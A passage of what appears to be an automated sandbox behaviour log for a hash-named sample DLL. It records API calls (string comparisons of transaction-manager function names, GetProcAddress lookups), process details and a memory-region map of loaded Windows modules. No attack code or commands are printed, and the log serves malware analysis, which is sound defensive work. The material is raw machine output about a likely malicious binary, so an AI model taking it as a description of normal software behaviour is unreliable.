1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0192.432] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0192.432] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0192.433] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0192.433] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.434] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0192.434] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0192.434] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0192.434] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0192.434] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0192.434] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0192.434] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0192.434] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0192.434] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0192.434] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.435] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0192.436] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0192.437] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0192.439] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0192.440] GetProcessHeap () returned 0x590000 [0192.440] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0192.452] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0192.453] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0192.454] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x2d05030 [0192.455] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e) returned 0x5a8550 [0192.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_destroy_cstr_index", cchWideChar=-1, lpMultiByteStr=0x5a8550, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_destroy_cstr_index", lpUsedDefaultChar=0x0) returned 23 [0192.456] GetLastError () returned 0x0 [0192.456] SetLastError (dwErrCode=0x0) [0192.456] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_indexW") returned 0x0 [0192.456] GetLastError () returned 0x7f [0192.456] SetLastError (dwErrCode=0x7f) [0192.456] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_indexA") returned 0x0 [0192.456] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_index") returned 0x7ffc45f1a910 [0192.456] GetActiveWindow () returned 0x0 [0192.518] GetLastError () returned 0x7f [0192.518] SetLastError (dwErrCode=0x7f) Thread: id = 183 os_tid = 0x2a4 Process: id = "20" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x5d586000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4697 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4698 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4699 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4700 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4701 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 4702 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4703 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4704 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4705 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4706 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 4707 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4708 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4709 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4710 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4711 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4712 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 4713 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4714 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4715 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4716 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4717 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4718 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4719 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4720 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4721 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4722 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4723 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4724 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4725 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4726 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4727 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4728 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4729 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4730 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4731 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4732 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4733 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4734 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 4735 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4736 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 4737 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 4738 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4739 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4740 start_va = 0x1e80000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4741 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4742 start_va = 0x1e80000 end_va = 0x1f3ffff monitored = 0 entry_point = 0x1ea0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4743 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 4745 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 4747 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4748 start_va = 0x2000000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4749 start_va = 0x2200000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4750 start_va = 0x2600000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 4751 start_va = 0x2e00000 end_va = 0x3dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 6067 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 6081 start_va = 0x3dd0000 end_va = 0x4106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6176 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 6177 start_va = 0x4110000 end_va = 0x439cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6196 start_va = 0x4110000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6199 start_va = 0x4110000 end_va = 0x42d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6274 start_va = 0x4110000 end_va = 0x56a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6477 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6480 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6481 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6483 start_va = 0x4110000 